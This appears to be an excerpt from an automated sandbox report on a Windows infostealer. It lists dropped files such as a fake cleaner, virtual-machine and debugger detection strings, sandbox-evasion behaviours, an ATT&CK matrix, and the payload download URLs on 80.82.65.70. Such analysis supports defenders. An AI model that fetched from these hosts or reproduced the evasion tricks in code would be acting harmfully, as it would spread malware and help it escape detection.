Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\file.exe TID: 7368Thread sleep count: 58 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7368Thread sleep time: -116058s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7328Thread sleep count: 46 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7328Thread sleep count: 82 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7340Thread sleep count: 2589 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7340Thread sleep time: -5180589s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7328Thread sleep count: 40 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7328Thread sleep count: 154 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7448Thread sleep time: -40000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7352Thread sleep count: 106 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7352Thread sleep time: -212106s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7348Thread sleep count: 2375 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7348Thread sleep time: -4752375s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7360Thread sleep count: 105 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7360Thread sleep time: -210105s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7344Thread sleep count: 2381 > 30Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7344Thread sleep time: -4764381s >= -30000sJump to behavior
Source: file.exe, file.exe, 00000000.00000002.2664793231.00000000009B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.6.drBinary or memory string: VMware
Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000003.2278951429.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253670934.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101913818.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177695889.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202839902.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152495724.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127385618.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313770429.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2665430518.0000000001005000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228425864.0000000005474000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076681288.0000000005474000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.drBinary or memory string: vmci.sys
Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.drBinary or memory string: VMware20,1
Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.2664793231.00000000009B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
Source: C:\Users\user\Desktop\file.exeFile opened: SICE
Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00825CD4 rdtsc 0_2_00825CD4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A54A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A20
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]0_2_10007A76
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]0_2_10005F25
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F4C9DB push dword ptr fs:[00000030h]0_2_00F4C9DB
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D10D90 mov eax, dword ptr fs:[00000030h]0_2_04D10D90
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D1092B mov eax, dword ptr fs:[00000030h]0_2_04D1092B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402EC0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc,0_2_00402EC0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004099EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004099EA
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A54A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDA3
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A6E0 SetUnhandledExceptionFilter,0_2_0040A6E0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D19C51 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04D19C51
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D1A7B1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04D1A7B1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D1D00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04D1D00A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04D1A947 SetUnhandledExceptionFilter,0_2_04D1A947
Source: file.exe, file.exe, 00000000.00000002.2664793231.00000000009B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: hProgram Manager
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A2AC cpuid 0_2_0040A2AC
Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004107E2 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_004107E2
Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Command and Scripting Interpreter		1
DLL Side-Loading		2
Process Injection		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		24
Virtualization/Sandbox Evasion		LSASS Memory781
Security Software Discovery		Remote Desktop ProtocolData from Removable Media12
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Process Injection		Security Account Manager24
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS3
Process Discovery		Distributed Component Object ModelInput Capture11
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
Software Packing		Cached Domain Credentials1
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp		DCSync223
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe45%ReversingLabsWin32.Infostealer.Tinba
file.exe100%AviraHEUR/AGEN.1320706
file.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]0%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]75%ReversingLabsByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Bunifu_UI_v1.5.3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\es3Yf5ZWrKdS0dDs0WN3JzEN\Y-Cleaner.exe75%ReversingLabsByteCode-MSIL.Trojan.Malgent

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://80.82.65.70/files/downloadc:y0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadj0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadM50%Avira URL Cloudsafe
http://80.82.65.70/files/download60%Avira URL Cloudsafe
http://80.82.65.70/files/downloadm:g0%Avira URL Cloudsafe
http://80.82.65.70/soft/downe:0%Avira URL Cloudsafe
http://80.82.65.70/dll/keyN0%Avira URL Cloudsafe
http://80.82.65.70/files/download.100%Avira URL Cloudmalware
http://80.82.65.70/files/downloadQ50%Avira URL Cloudsafe
http://80.82.65.70/files/downloadt0%Avira URL Cloudsafe
http://80.82.65.70/add?substr=mixtwo&s=three&sub=empWD0%Avira URL Cloudsafe
http://80.82.65.70/files/downloader:0%Avira URL Cloudsafe
http://80.82.65.70/files/downloads50%Avira URL Cloudsafe
http://80.82.65.70/files0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadq:0%Avira URL Cloudsafe
http://80.82.65.0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadJCZ0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadi5c0%Avira URL Cloudsafe
http://80.82.65.70/files/download8yb0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadV0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadvy$0%Avira URL Cloudsafe
http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp=Ee0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadA0%Avira URL Cloudsafe
http://80.82.65.70/files/downloadeep-Al0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://80.82.65.70/dll/downloadfalse
    		high
    http://80.82.65.70/dll/keyfalse
      		high
      http://80.82.65.70/files/downloadfalse
        		high
        http://80.82.65.70/soft/downloadfalse
          		high
          http://80.82.65.70/add?substr=mixtwo&s=three&sub=empfalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://80.82.65.70/files/downloadjfile.exe, 00000000.00000003.2152414273.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202764538.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253635667.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177624907.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228368490.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2278917288.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127311530.000000000583E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://80.82.65.70/dll/keyNfile.exe, 00000000.00000002.2665430518.0000000001005000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://80.82.65.70/files/downloadM5file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228394305.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202790223.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://80.82.65.70/files/downloadm:gfile.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127338582.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228394305.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202790223.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101877799.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152442552.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177651450.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://80.82.65.70/soft/downe:file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://80.82.65.70/files/download.file.exe, 00000000.00000003.2202764538.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253635667.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177624907.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228368490.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2278917288.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://80.82.65.70/files/downloadQ5file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://80.82.65.70/files/downloadc:yfile.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228394305.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202790223.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152442552.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177651450.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://80.82.65.70/files/download6file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://80.82.65.70/files/downloadtfile.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://80.82.65.70/add?substr=mixtwo&s=three&sub=empWDfile.exe, 00000000.00000002.2667518035.0000000005460000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://80.82.65.70/files/downloader:file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://80.82.65.file.exe, 00000000.00000003.2403846656.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403411485.000000000583E000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://upx.sf.netAmcache.hve.6.drfalse
              		high
              http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174file.exe, 00000000.00000003.2451035215.000000000552F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.0000000005801000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450949738.00000000058BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                		high
                http://80.82.65.70/files/downloadq:file.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127338582.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228394305.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202790223.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2076612201.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101877799.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2152442552.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177651450.0000000005552000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://80.82.65.70/filesfile.exe, 00000000.00000003.2403411485.000000000583E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://80.82.65.70/files/downloads5file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://80.82.65.70/files/downloadi5cfile.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228394305.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://g-cleanit.hkfile.exe, 00000000.00000003.2451035215.000000000552F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.0000000005801000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450949738.00000000058BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2450156986.00000000058B9000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drfalse
                  		high
                  http://80.82.65.70/files/download8ybfile.exe, 00000000.00000002.2665430518.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://80.82.65.70/files/downloadJCZfile.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://80.82.65.70/files/downloadVfile.exe, 00000000.00000003.2278917288.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://80.82.65.70/files/downloadvy$file.exe, 00000000.00000002.2665430518.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://80.82.65.70/files/download0/files/downloadfile.exe, 00000000.00000003.2369026142.0000000005552000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2403702199.0000000005553000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2451035215.0000000005553000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp=Eefile.exe, 00000000.00000002.2667518035.0000000005460000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://80.82.65.70/files/downloadeep-Alfile.exe, 00000000.00000003.2152414273.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202764538.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2253635667.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2177624907.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228368490.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2278917288.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313742166.000000000583E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2348559063.000000000583E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
